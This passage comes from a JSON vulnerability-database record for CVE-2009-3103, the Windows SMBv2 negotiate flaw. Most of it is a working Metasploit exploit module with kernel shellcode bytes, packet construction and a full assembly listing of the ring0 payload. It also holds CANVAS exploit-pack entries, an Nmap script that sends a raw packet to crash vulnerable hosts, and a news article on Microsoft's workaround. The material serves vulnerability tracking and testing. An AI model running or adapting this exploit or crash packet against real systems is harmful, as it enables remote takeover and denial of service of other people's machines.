\nrelease candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista \nwithout SP1 does not seem affected by this flaw. \n}, \n \n'Author' => [ 'laurent.gaffie[at]gmail.com', 'hdm', 'sf' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n['CVE', '2009-3103'], \n['BID', '36299'], \n['OSVDB', '57799'], \n['URL', 'http://seclists.org/fulldisclosure/2009/Sep/0039.html'], \n['URL', 'http://www.microsoft.com/technet/security/advisory/975497.mspx'] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n}, \n'Privileged' => true, \n'Payload' => \n{ \n'Space' => 1024, \n'StackAdjustment' => -3500, \n'DisableNops' => true, \n'EncoderType' => Msf::Encoder::Type::Raw, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows Vista SP1/SP2 and Server 2008 (x86)', \n{ \n'Platform' => 'win', \n'Arch' => [ ARCH_X86 ], \n'Ret' => 0xFFD00D09, # \"POP ESI; RET\" from the kernels HAL memory region ...no ASLR :) \n'ReadAddress' => 0xFFDF0D04, # A readable address from kernel space (no nulls in address). \n'ProcessIDHigh' => 0x0217, # srv2!SrvSnapShotScavengerTimer \n'MagicIndex' => 0x3FFFFFB4, # (DWORD)( MagicIndex*4 + 0x130 ) == 0 \n} \n], \n], \n'DefaultTarget' => 0 \n)) \n \nregister_options( [ Opt::RPORT(445), OptInt.new( 'WAIT', [ true, \"The number of seconds to wait for the attack to complete.\", 180 ] ) ], self.class ) \nend \n \n# The payload works as follows: \n# * Our sysenter handler and ring3 stagers are copied over to safe location. \n# * The SYSENTER_EIP_MSR is patched to point to our sysenter handler. \n# * The srv2.sys thread we are in is placed in a halted state. \n# * Upon any ring3 proces issuing a sysenter command our ring0 sysenter handler gets control. \n# * The ring3 return address is modified to force our ring3 stub to be called if certain conditions met. \n# * If NX is enabled we patch the respective page table entry to disable it for the ring3 code. \n# * Control is passed to real sysenter handler, upon the real sysenter handler finishing, sysexit will return to our ring3 stager. \n# * If the ring3 stager is executing in the desired process our sysenter handler is removed and the real ring3 payload called. \ndef ring0_x86_payload( opts = {} ) \n \n# The page table entry for StagerAddressUser, used to bypass NX in ring3 on PAE enabled systems (should be static). \npagetable = opts['StagerAddressPageTable'] || 0xC03FFF00 \n \n# The address in kernel memory where we place our ring0 and ring3 stager (no ASLR). \nkstager = opts['StagerAddressKernel'] || 0xFFDF0400 \n \n# The address in shared memory (addressable from ring3) where we can find our ring3 stager (no ASLR). \nustager = opts['StagerAddressUser'] || 0x7FFE0400 \n \n# Target SYSTEM process to inject ring3 payload into. \nprocess = (opts['RunInWin32Process'] || 'lsass.exe').unpack('C*') \n \n# A simple hash of the process name based on the first 4 wide chars. \n# Assumes process is located at '*:\\windows\\system32\\'. (From Rex::Payloads::Win32::Kernel::Stager) \nchecksum = process[0] + ( process[2] << 8 ) + ( process[1] << 16 ) + ( process[3] << 24 ) \n \n# The ring0 -> ring3 payload blob. Full assembly listing given below. \nr0 = \"\\xFC\\xFA\\xEB\\x1E\\x5E\\x68\\x76\\x01\\x00\\x00\\x59\\x0F\\x32\\x89\\x46\\x60\" + \n\"\\x8B\\x7E\\x64\\x89\\xF8\\x0F\\x30\\xB9\\x41\\x41\\x41\\x41\\xF3\\xA4\\xFB\\xF4\" + \n\"\\xEB\\xFD\\xE8\\xDD\\xFF\\xFF\\xFF\\x6A\\x00\\x9C\\x60\\xE8\\x00\\x00\\x00\\x00\" + \n\"\\x58\\x8B\\x58\\x57\\x89\\x5C\\x24\\x24\\x81\\xF9\\xDE\\xC0\\xAD\\xDE\\x75\\x10\" + \n\"\\x68\\x76\\x01\\x00\\x00\\x59\\x89\\xD8\\x31\\xD2\\x0F\\x30\\x31\\xC0\\xEB\\x34\" + \n\"\\x8B\\x32\\x0F\\xB6\\x1E\\x66\\x81\\xFB\\xC3\\x00\\x75\\x28\\x8B\\x58\\x5F\\x8D\" + \n\"\\x5B\\x6C\\x89\\x1A\\xB8\\x01\\x00\\x00\\x80\\x0F\\xA2\\x81\\xE2\\x00\\x00\\x10\" + \n\"\\x00\\x74\\x11\\xBA\\x45\\x45\\x45\\x45\\x81\\xC2\\x04\\x00\\x00\\x00\\x81\\x22\" + \n\"\\xFF\\xFF\\xFF\\x7F\\x61\\x9D\\xC3\\xFF\\xFF\\xFF\\xFF\\x42\\x42\\x42\\x42\\x43\" + \n\"\\x43\\x43\\x43\\x60\\x6A\\x30\\x58\\x99\\x64\\x8B\\x18\\x39\\x53\\x0C\\x74\\x2E\" + \n\"\\x8B\\x43\\x10\\x8B\\x40\\x3C\\x83\\xC0\\x28\\x8B\\x08\\x03\\x48\\x03\\x81\\xF9\" + \n\"\\x44\\x44\\x44\\x44\\x75\\x18\\xE8\\x0A\\x00\\x00\\x00\\xE8\\x10\\x00\\x00\\x00\" + \n\"\\xE9\\x09\\x00\\x00\\x00\\xB9\\xDE\\xC0\\xAD\\xDE\\x89\\xE2\\x0F\\x34\\x61\\xC3\" \n# Patch in the required values. \nr0 = r0.gsub( [ 0x41414141 ].pack(\"V\"), [ ( r0.length + payload.encoded.length - 0x1C ) ].pack(\"V\") ) \nr0 = r0.gsub( [ 0x42424242 ].pack(\"V\"), [ kstager ].pack(\"V\") ) \nr0 = r0.gsub( [ 0x43434343 ].pack(\"V\"), [ ustager ].pack(\"V\") ) \nr0 = r0.gsub( [ 0x44444444 ].pack(\"V\"), [ checksum ].pack(\"V\") ) \nr0 = r0.gsub( [ 0x45454545 ].pack(\"V\"), [ pagetable ].pack(\"V\") ) \n# Return the ring0 -> ring3 payload blob with the real ring3 payload appended. \nreturn r0 + payload.encoded \nend \n \ndef exploit \nprint_status( \"Connecting to the target (#{datastore['RHOST']}:#{datastore['RPORT']})...\" ) \nconnect \n \n# we use ReadAddress to avoid problems in srv2!SrvProcCompleteRequest \n# and srv2!SrvProcPartialCompleteCompoundedRequest \ndialects = [ [ target['ReadAddress'] ].pack(\"V\") * 25, \"SMB 2.002\" ] \n \ndata = dialects.collect { |dialect| \"\\x02\" + dialect + \"\\x00\" }.join('') \ndata += [ 0x00000000 ].pack(\"V\") * 37 # Must be NULL's \ndata += [ 0xFFFFFFFF ].pack(\"V\") # Used in srv2!SrvConsumeDataAndComplete2+0x34 (known stability issue with srv2!SrvConsumeDataAndComplete2+6b) \ndata += [ 0xFFFFFFFF ].pack(\"V\") # Used in srv2!SrvConsumeDataAndComplete2+0x34 \ndata += [ 0x42424242 ].pack(\"V\") * 7 # Unused \ndata += [ target['MagicIndex'] ].pack(\"V\") # An index to force an increment the SMB header value :) (srv2!SrvConsumeDataAndComplete2+0x7E) \ndata += [ 0x41414141 ].pack(\"V\") * 6 # Unused \ndata += [ target.ret ].pack(\"V\") # EIP Control thanks to srv2!SrvProcCompleteRequest+0xD2 \ndata += ring0_x86_payload( target['PayloadOptions'] || {} ) # Our ring0 -> ring3 shellcode \n \n# We gain code execution by returning into the SMB packet, begining with its header. \n# The SMB packets Magic Header value is 0xFF534D42 which assembles to \"CALL DWORD PTR [EBX+0x4D]; INC EDX\" \n# This will cause an access violation if executed as we can never set EBX to a valid pointer. \n# To overcome this we force an increment of the header value (via MagicIndex), transforming it to 0x00544D42. \n# This assembles to \"ADD BYTE PTR [EBP+ECX*2+0x42], DL\" which is fine as ECX will be zero and EBP is a vaild pointer. \n# We patch the Signature1 value to be a jump forward into our shellcode. \npacket = Rex::Proto::SMB::Constants::SMB_NEG_PKT.make_struct \npacket['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_NEGOTIATE \npacket['Payload']['SMB'].v['Flags1'] = 0x18 \npacket['Payload']['SMB'].v['Flags2'] = 0xC853 \npacket['Payload']['SMB'].v['ProcessIDHigh'] = target['ProcessIDHigh'] \npacket['Payload']['SMB'].v['Signature1'] = 0x0158E900 # \"JMP DWORD 0x15D\" ; jump into our ring0 payload. \npacket['Payload']['SMB'].v['Signature2'] = 0x00000000 # ... \npacket['Payload']['SMB'].v['MultiplexID'] = rand( 0x10000 ) \npacket['Payload'].v['Payload'] = data \n \npacket = packet.to_s \n \nprint_status( \"Sending the exploit packet (#{packet.length} bytes)...\" ) \nsock.put( packet ) \n \n \nwtime = datastore['WAIT'].to_i \nprint_status( \"Waiting up to #{wtime} second#{wtime == 1 ? '' : 's'} for exploit to trigger...\" ) \nstime = Time.now.to_i \n \n \npoke_logins = %W{Guest Administrator} \npoke_logins.each do |login| \nbegin \nsec = connect(false) \nsec.login(datastore['SMBName'], login, rand_text_alpha(rand(8)+1), rand_text_alpha(rand(8)+1)) \nrescue ::Exception => e \nsec.socket.close \nend \nend \n \nwhile( stime + wtime > Time.now.to_i ) \nselect(nil, nil, nil, 0.25) \nbreak if session_created? \nend \n \nhandler \ndisconnect \nend \n \nend \n \n=begin \n;=================================================================================== \n; sf \n; Recommended Reading: Kernel-mode Payloads on Windows, 2005, bugcheck & skape. \n; http://www.uninformed.org/?v=3&a=4&t=sumry \n;=================================================================================== \n[bits 32] \n[org 0] \n;=================================================================================== \nring0_migrate_start: \ncld \ncli \njmp short ring0_migrate_bounce ; jump to bounce to get ring0_stager_start address \nring0_migrate_patch: \npop esi ; pop off ring0_stager_start address \n; get current sysenter msr (nt!KiFastCallEntry) \npush 0x176 ; SYSENTER_EIP_MSR \npop ecx \nrdmsr \n; save origional sysenter msr (nt!KiFastCallEntry) \nmov dword [ esi + ( ring0_stager_data - ring0_stager_start ) + 0 ], eax \n; retrieve the address in kernel memory where we will write the ring0 stager + ring3 code \nmov edi, dword [ esi + ( ring0_stager_data - ring0_stager_start ) + 4 ] \n; patch sysenter msr to be our stager \nmov eax, edi \nwrmsr \n; copy over stager to shared memory \nmov ecx, 0x41414141 ; ( ring3_stager - ring0_stager_start + length(ring3_stager) ) \nrep movsb \nsti ; set interrupt flag \n; Halt this thread to avoid problems. \nring0_migrate_idle: \nhlt \njmp short ring0_migrate_idle \nring0_migrate_bounce: \ncall ring0_migrate_patch ; call the patch code, pushing the ring0_stager_start address to stack \n;=================================================================================== \n; This stager will now get called every time a ring3 process issues a sysenter \nring0_stager_start: \npush byte 0 ; alloc a dword for the patched return address \npushfd ; save flags and registers \npushad \ncall ring0_stager_eip \nring0_stager_eip: \npop eax \n; patch in the real nt!KiFastCallEntry address as our return address \nmov ebx, dword [ eax + ( ring0_stager_data - ring0_stager_eip ) + 0 ] \nmov [ esp + 36 ], ebx \n; see if we are being told to remove our sysenter hook... \ncmp ecx, 0xDEADC0DE \njne ring0_stager_hook \npush 0x176 ; SYSENTER_EIP_MSR \npop ecx \nmov eax, ebx ; set the sysenter msr to be the real nt!KiFastCallEntry address \nxor edx, edx \nwrmsr \nxor eax, eax ; clear eax (the syscall number) so we can continue \njmp short ring0_stager_finish \nring0_stager_hook: \n; get the origional r3 return address (edx is the ring3 stack pointer) \nmov esi, [ edx ] \n; determine if the return is to a \"ret\" instruction \nmovzx ebx, byte [ esi ] \ncmp bx, 0xC3 \n; only insert our ring3 stager hook if we are to return to a single ret (for stability). \njne short ring0_stager_finish \n; calculate our r3 address in shared memory \nmov ebx, dword [ eax + ( ring0_stager_data - ring0_stager_eip ) + 8 ] \nlea ebx, [ ebx + ring3_start - ring0_stager_start ] \n; patch in our r3 stage as the r3 return address \nmov [ edx ], ebx \n; detect if NX is present (clobbers eax,ebx,ecx,edx)... \nmov eax, 0x80000001 \ncpuid \nand edx, 0x00100000 ; bit 20 is the NX bit \njz short ring0_stager_finish \n; modify the correct page table entry to make our ring3 stager executable \nmov edx, 0x45454545 ; we default to 0xC03FFF00 this for now (should calculate dynamically). \nadd edx, 4 \nand dword [ edx ], 0x7FFFFFFF ; clear the NX bit \n; finish up by returning into the real KiFastCallEntry and then returning into our ring3 code (if hook was set). \nring0_stager_finish: \npopad ; restore registers \npopfd ; restore flags \nret ; return to real nt!KiFastCallEntry \nring0_stager_data: \ndd 0xFFFFFFFF ; saved nt!KiFastCallEntry \ndd 0x42424242 ; kernel memory address of stager (default to 0xFFDF0400) \ndd 0x43434343 ; shared user memory address of stager (default to 0x7FFE0400) \n;=================================================================================== \nring3_start: \npushad \npush byte 0x30 \npop eax \ncdq ; zero edx \nmov ebx, [ fs : eax ] ; get the PEB \ncmp [ ebx + 0xC ], edx \njz ring3_finish \nmov eax, [ ebx + 0x10 ] ; get pointer to the ProcessParameters (_RTL_USER_PROCESS_PARAMETERS) \nmov eax, [ eax + 0x3C ] ; get the current processes ImagePathName (unicode string) \nadd eax, byte 0x28 ; advance past '*:\\windows\\system32\\' (we assume this as we want a system process). \nmov ecx, [ eax ] ; compute a simple hash of the name. get first 2 wide chars of name 'l\\x00s\\x00' \nadd ecx, [ eax + 0x3 ] ; and add '\\x00a\\x00s' \ncmp ecx, 0x44444444 ; check the hash (default to hash('lsass.exe') == 0x7373616C) \njne ring3_finish ; if we are not currently in the correct process, return to real caller \ncall ring3_cleanup ; otherwise we first remove our ring0 sysenter hook \ncall ring3_stager ; and then call the real ring3 payload \njmp ring3_finish ; should the payload return we can resume this thread correclty. \nring3_cleanup: \nmov ecx, 0xDEADC0DE ; set the magic value for ecx \nmov edx, esp ; save our esp in edx for sysenter \nsysenter ; now sysenter into ring0 to remove the sysenter hook (return to ring3_cleanup's caller). \nring3_finish: \npopad \nret ; return to the origional system calls caller \n;=================================================================================== \nring3_stager: \n; ...ring3 stager here... \n;=================================================================================== \n=end \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/81723/smb2_negotiate_func_index.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "canvas": [{"lastseen": "2018-11-01T14:03:25", "references": [], "description": "**Name**| smb2_negotiate_local \n---|--- \n**CVE**| CVE-2009-3103 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| SMB2 Negotiate Pointer Dereference Vulnerability \n**Notes**| CVE Name: CVE-2009-3103 \nVENDOR: Microsoft \nVersionsAffected: \nRepeatability: One shot \nReferences: http://blog.48bits.com/?p=510, http://www.microsoft.com/technet/security/Bulletin/MS09-050.mspx \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103 \nDate public: 09/07/09 \nCVSS: 7.8 \n\n", "edition": 1, "reporter": "Immunity Canvas", "published": "2009-09-08T18:30:00", "title": "Immunity Canvas: SMB2_NEGOTIATE_LOCAL", "type": "canvas", "enchantments": {"score": {"modified": "2018-11-01T14:03:25", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3103"], "modified": "2009-09-08T18:30:00", "id": "SMB2_NEGOTIATE_LOCAL", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/smb2_negotiate_local", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-25T14:13:49", "references": [], "edition": 1, "description": "**Name**| smb2_negotiate_remote \n---|--- \n**CVE**| CVE-2009-3103 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| SMB2 Negotiate Pointer Dereference Vulnerability \n**Notes**| CVE Name: CVE-2009-3103 \nVENDOR: Microsoft \nMSADV: MS09-050 \nVersionsAffected: \nRepeatability: One shot \nReferences: http://blog.48bits.com/?p=510, http://www.microsoft.com/technet/security/Bulletin/MS09-050.mspx \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103 \nDate public: 09/07/09 \nCVSS: 7.8 \n\n", "reporter": "Immunity Canvas", "published": "2009-09-08T18:30:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "canvas", "title": "Immunity Canvas: SMB2_NEGOTIATE_REMOTE", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3103"], "modified": "2009-09-08T18:30:00", "id": "SMB2_NEGOTIATE_REMOTE", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/smb2_negotiate_remote", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nmap": [{"lastseen": "2018-08-28T16:23:49", "references": [], "description": "Detects Microsoft Windows systems vulnerable to denial of service (CVE-2009-3103). This script will crash the service if it is vulnerable. \n\nThe script performs a denial-of-service against the vulnerability disclosed in CVE-2009-3103. This works against Windows Vista and some versions of Windows 7, and causes a bluescreen if successful. The proof-of-concept code at http://seclists.org/fulldisclosure/2009/Sep/39 was used, with one small change. \n\nThis check was previously part of smb-check-vulns.\n\n## Script Arguments \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. \n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the smb library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the vulns library. \n\n## Example Usage \n \n \n nmap --script smb-vuln-cve2009-3103.nse -p445 <host>\n nmap -sU --script smb-vuln-cve2009-3103.nse -p U:137,T:139 <host>\n \n\n## Script Output \n \n \n Host script results:\n | smb-vuln-cve2009-3103:\n | VULNERABLE:\n | SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)\n | State: VULNERABLE\n | IDs: CVE:CVE-2009-3103\n | Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,\n | Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a\n | denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE\n | PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,\n | aka \"SMBv2 Negotiation Vulnerability.\" NOTE: some of these details are obtained from third party information.\n |\n | Disclosure date: 2009-09-08\n | References:\n | http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103\n |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103\n \n\n## Requires \n\n * nmap\n * smb\n * stdnse\n * vulns\n\n* * *\n", "edition": 8, "reporter": "Ron Bowes, Jiayi Ye, Paulino Calderon <calderon()websec.mx>", "published": "2015-10-03T06:07:49", "title": "smb-vuln-cve2009-3103 NSE Script", "type": "nmap", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3103"], "modified": "2018-08-27T22:00:13", "id": "NMAP:SMB-VULN-CVE2009-3103.NSE", "href": "https://nmap.org/nsedoc/scripts/smb-vuln-cve2009-3103.html", "sourceData": "local nmap = require \"nmap\"\nlocal smb = require \"smb\"\nlocal stdnse = require \"stdnse\"\nlocal vulns = require \"vulns\"\n\ndescription = [[\nDetects Microsoft Windows systems vulnerable to denial of service (CVE-2009-3103).\nThis script will crash the service if it is vulnerable.\n\nThe script performs a denial-of-service against the vulnerability disclosed in\nCVE-2009-3103. This works against Windows Vista and some versions of Windows 7,\nand causes a bluescreen if successful. The proof-of-concept code at\nhttp://seclists.org/fulldisclosure/2009/Sep/39 was used, with one small change.\n\nThis check was previously part of smb-check-vulns.\n]]\n\n---\n--@usage\n-- nmap --script smb-vuln-cve2009-3103.nse -p445 <host>\n-- nmap -sU --script smb-vuln-cve2009-3103.nse -p U:137,T:139 <host>\n--\n--@output\n--Host script results:\n--| smb-vuln-cve2009-3103:\n--| VULNERABLE:\n--| SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)\n--| State: VULNERABLE\n--| IDs: CVE:CVE-2009-3103\n--| Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,\n--| Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a\n--| denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE\n--| PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,\n--| aka \"SMBv2 Negotiation Vulnerability.\" NOTE: some of these details are obtained from third party information.\n--|\n--| Disclosure date: 2009-09-08\n--| References:\n--| http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103\n--|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103\n---\n\nauthor = {\"Ron Bowes\", \"Jiayi Ye\", \"Paulino Calderon <calderon()websec.mx>\"}\ncopyright = \"Ron Bowes\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"intrusive\",\"exploit\",\"dos\",\"vuln\"}\n-- run after all smb-* scripts (so if it DOES crash something, it doesn't kill\n-- other scans have had a chance to run)\ndependencies = {\n \"smb-brute\", \"smb-enum-sessions\", \"smb-security-mode\",\n \"smb-enum-shares\", \"smb-server-stats\",\n \"smb-enum-domains\", \"smb-enum-users\", \"smb-system-info\",\n \"smb-enum-groups\", \"smb-os-discovery\", \"smb-enum-processes\",\n \"smb-psexec\",\n};\n\n\nhostrule = function(host)\n return smb.get_port(host) ~= nil\nend\n\nlocal VULNERABLE = 1\nlocal PATCHED = 2\n\nlocal function check_smbv2_dos(host)\n -- From http://seclists.org/fulldisclosure/2009/Sep/0039.html with one change on the last line.\n local buf = \"\\x00\\x00\\x00\\x90\" .. -- Begin SMB header: Session message\n \"\\xff\\x53\\x4d\\x42\" .. -- Server Component: SMB\n \"\\x72\\x00\\x00\\x00\" .. -- Negociate Protocol\n \"\\x00\\x18\\x53\\xc8\" .. -- Operation 0x18 & sub 0xc853\n \"\\x00\\x26\" .. -- Process ID High: --> :) normal value should be \"\\x00\\x00\"\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xfe\" ..\n \"\\x00\\x00\\x00\\x00\\x00\\x6d\\x00\\x02\\x50\\x43\\x20\\x4e\\x45\\x54\" ..\n \"\\x57\\x4f\\x52\\x4b\\x20\\x50\\x52\\x4f\\x47\\x52\\x41\\x4d\\x20\\x31\" ..\n \"\\x2e\\x30\\x00\\x02\\x4c\\x41\\x4e\\x4d\\x41\\x4e\\x31\\x2e\\x30\\x00\" ..\n \"\\x02\\x57\\x69\\x6e\\x64\\x6f\\x77\\x73\\x20\\x66\\x6f\\x72\\x20\\x57\" ..\n \"\\x6f\\x72\\x6b\\x67\\x72\\x6f\\x75\\x70\\x73\\x20\\x33\\x2e\\x31\\x61\" ..\n \"\\x00\\x02\\x4c\\x4d\\x31\\x2e\\x32\\x58\\x30\\x30\\x32\\x00\\x02\\x4c\" ..\n \"\\x41\\x4e\\x4d\\x41\\x4e\\x32\\x2e\\x31\\x00\\x02\\x4e\\x54\\x20\\x4c\" ..\n \"\\x4d\\x20\\x30\\x2e\\x31\\x32\\x00\\x02\\x53\\x4d\\x42\\x20\\x32\\x2e\" ..\n \"\\x30\\x30\\x32\\x00\"\n\n local socket = nmap.new_socket()\n if(socket == nil) then\n return false, \"Couldn't create socket\"\n end\n\n local status, result = socket:connect(host, 445)\n if(status == false) then\n socket:close()\n return false, \"Couldn't connect to host: \" .. result\n end\n\n status, result = socket:send(buf)\n if(status == false) then\n socket:close()\n return false, \"Couldn't send the buffer: \" .. result\n end\n\n -- Close the socket\n socket:close()\n\n -- Give it some time to crash\n stdnse.debug1(\"Waiting 5 seconds to see if Windows crashed\")\n stdnse.sleep(5)\n\n -- Create a new socket\n socket = nmap.new_socket()\n if(socket == nil) then\n return false, \"Couldn't create socket\"\n end\n\n -- Try and do something simple\n stdnse.debug1(\"Attempting to connect to the host\")\n socket:set_timeout(5000)\n status, result = socket:connect(host, 445)\n\n -- Check the result\n if(status == false or status == nil) then\n stdnse.debug1(\"Connect failed, host is likely vulnerable!\")\n socket:close()\n return true, VULNERABLE\n end\n\n -- Try sending something\n stdnse.debug1(\"Attempting to send data to the host\")\n status, result = socket:send(\"AAAA\")\n if(status == false or status == nil) then\n stdnse.debug1(\"Send failed, host is likely vulnerable!\")\n socket:close()\n return true, VULNERABLE\n end\n\n stdnse.debug1(\"Checks finished; host is likely not vulnerable.\")\n socket:close()\n return true, PATCHED\nend\n\naction = function(host)\n\n local status, result, message\n local response = {}\n local vuln_report = vulns.Report:new(SCRIPT_NAME, host)\n local vuln_table = {\n title = 'SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)',\n state = vulns.STATE.NOT_VULN,\n description = [[\n Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,\n Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a\n denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE\n PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,\n aka \"SMBv2 Negotiation Vulnerability.\"\n ]],\n IDS = {CVE = 'CVE-2009-3103'},\n references = {\n 'http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103'\n },\n dates = {\n disclosure = {year = '2009', month = '09', day = '08'},\n }\n }\n\n -- Check for SMBv2 vulnerability\n status, result = check_smbv2_dos(host)\n if(status == false) then\n vuln_table.state = vulns.STATE.NOT_VULN\n else\n if(result == VULNERABLE) then\n vuln_table.state = vulns.STATE.VULN\n else\n vuln_table.state = vulns.STATE.NOT_VULN\n end\n end\n return vuln_report:make_output(vuln_table)\nend\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "nmap": {"scriptType": "hostrule", "categories": ["dos", "exploit", "vuln", "intrusive"]}}], "threatpost": [{"lastseen": "2018-10-06T23:09:35", "_object_types": ["robots.models.base.Bulletin", "robots.models.threatpost.ThreatpostBulletin"], "references": ["https://threatpost.com/microsoft-ships-temporary-fix-it-critical-vista-flaw-092309/", "https://threatpost.com/microsoft-ships-temporary-fix-it-critical-vista-flaw-092309/", "http://www.microsoft.com/technet/security/advisory/975497.mspx", "http://blogs.zdnet.com/security/?p=4350", "http://blogs.technet.com/srd/archive/2009/09/18/update-on-the-smb-vulnerability.aspx", "http://metasploit.com", "http://go.microsoft.com/?linkid=9683379", "http://go.microsoft.com/?linkid=9685006", "http://blogs.technet.com/srd/archive/2009/09/18/update-on-the-smb-vulnerability.aspx", "http://www.microsoft.com/technet/security/advisory/975497.mspx"], "description": "[](<https://threatpost.com/microsoft-ships-temporary-fix-it-critical-vista-flaw-092309/>)\n\nWith [exploit code in circulation](<https://threatpost.com/microsoft-ships-temporary-fix-it-critical-vista-flaw-092309/>) and facing a race against time to fix the SMB v2 vulnerability haunting Windows Vista and Windows Server 2008, Microsoft today shipped a one-click \u201cfix-it\u201d workaround to help users avoid malicious hacker attacks.\n\nThe fix-it package, which was added to Redmond\u2019s pre-patch [advisory](<http://www.microsoft.com/technet/security/advisory/975497.mspx>), effectively disables SMBv2 and then stops and starts the Server service. It provides temporary mitigation from remote code execution attacks targeting the known \u2014 and still unpatched \u2014 vulnerability.[ \n](<http://blogs.zdnet.com/security/?p=4350> \"Permanent Link to Remote exploit released for Windows Vista SMB2 worm hole\" )\n\nMicrosoft cautioned that disabling SMBv2 may slow down SMB connections between Windows Vista and Windows Server 2008 machines.\n\nThe company also [confirmed](<http://blogs.technet.com/srd/archive/2009/09/18/update-on-the-smb-vulnerability.aspx>) that the exploit code released into Immunity\u2019s Canvas pen-testing platform works as advertised:\n\n_We have analyzed the code ourselves and can confirm that it works reliably against 32-bit Windows Vista and Windows Server 2008 systems. The exploit gains complete control of the targeted system and can be launched by an unauthenticated user._\n\n_The exploit can be detected by intrusion detection systems (IDS) and firewalls that have signatures for the vulnerability being targeted (CVE-2009-3103)._\n\n_This exploit code from Immunity is only available to a small group of companies and organizations who will use it to determine the risk to their own networks and systems, or those of their customers. (We are aware that other groups are actively working on exploit code which is likely to be made public when it is completed)._\n\nIf reliable exploit code is released to the general public \u2014 [a strong likelihood](<http://metasploit.com>) \u2013it\u2019s only a matter of time before malicious hacker attacks surface in the wild. In the meantime, it\u2019s incumbent on Microsoft to ship an out-of-band patch as soon as possible.** \n**\n\nMicrosoft\u2019s Jonathan Ness hinted that an emergency patch may be forthcoming but it depends entirely on how soon the patch can pass quality assurance testing:\n\n_[We\u2019re] not slowing down our investigation, and are working on an update that can be delivered for all customers. The product team has built packages and are hard-at-work testing now to ensure quality. It takes more testing than you might think to release a quality update. For this update, the product team has so far already completed over 10,000 separate test cases in their regression testing. They are now in stress testing, 3rd-party application testing, and fuzzing. We\u2019d sure like to complete all that testing before the update needs to be released. We are keeping a close eye on the changing landscape and balancing this against the remaining test actions to determine the best ship schedule to bring a quality update to customers._\n\nIn the absence of a patch, here\u2019s what you can do:\n\n * [Click Here To Disable SMBv2](<http://go.microsoft.com/?linkid=9683379>)\n\nTo revert the workaround, and re-enable SMBv2, you can:\n\n * [Click Here To Re-Enable SMBv2](<http://go.microsoft.com/?linkid=9685006>)\n\nMitigation guidance for enterprises are available in [this blog post](<http://blogs.technet.com/srd/archive/2009/09/18/update-on-the-smb-vulnerability.aspx>) and in the [Microsoft security advisory](<http://www.microsoft.com/technet/security/advisory/975497.mspx>).\n", "reporter": "Ryan Naraine", "published": "2009-09-23T22:39:03", "type": "threatpost", "title": "Microsoft Ships Temporary Fix-It for Critical Vista Flaw", "enchantments": {"score": {"modified": "2018-10-06T23:09:35", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "info", "cvelist": ["CVE-2009-3103"], "_object_type": "robots.models.threatpost.ThreatpostBulletin", "modified": "2013-04-17T16:39:50", "id": "THREATPOST:9C5AF36512145E9639AF7CB83F66B032", "href": "https://threatpost.com/microsoft-ships-temporary-fix-it-critical-vista-flaw-092309/72219/", "cvss": 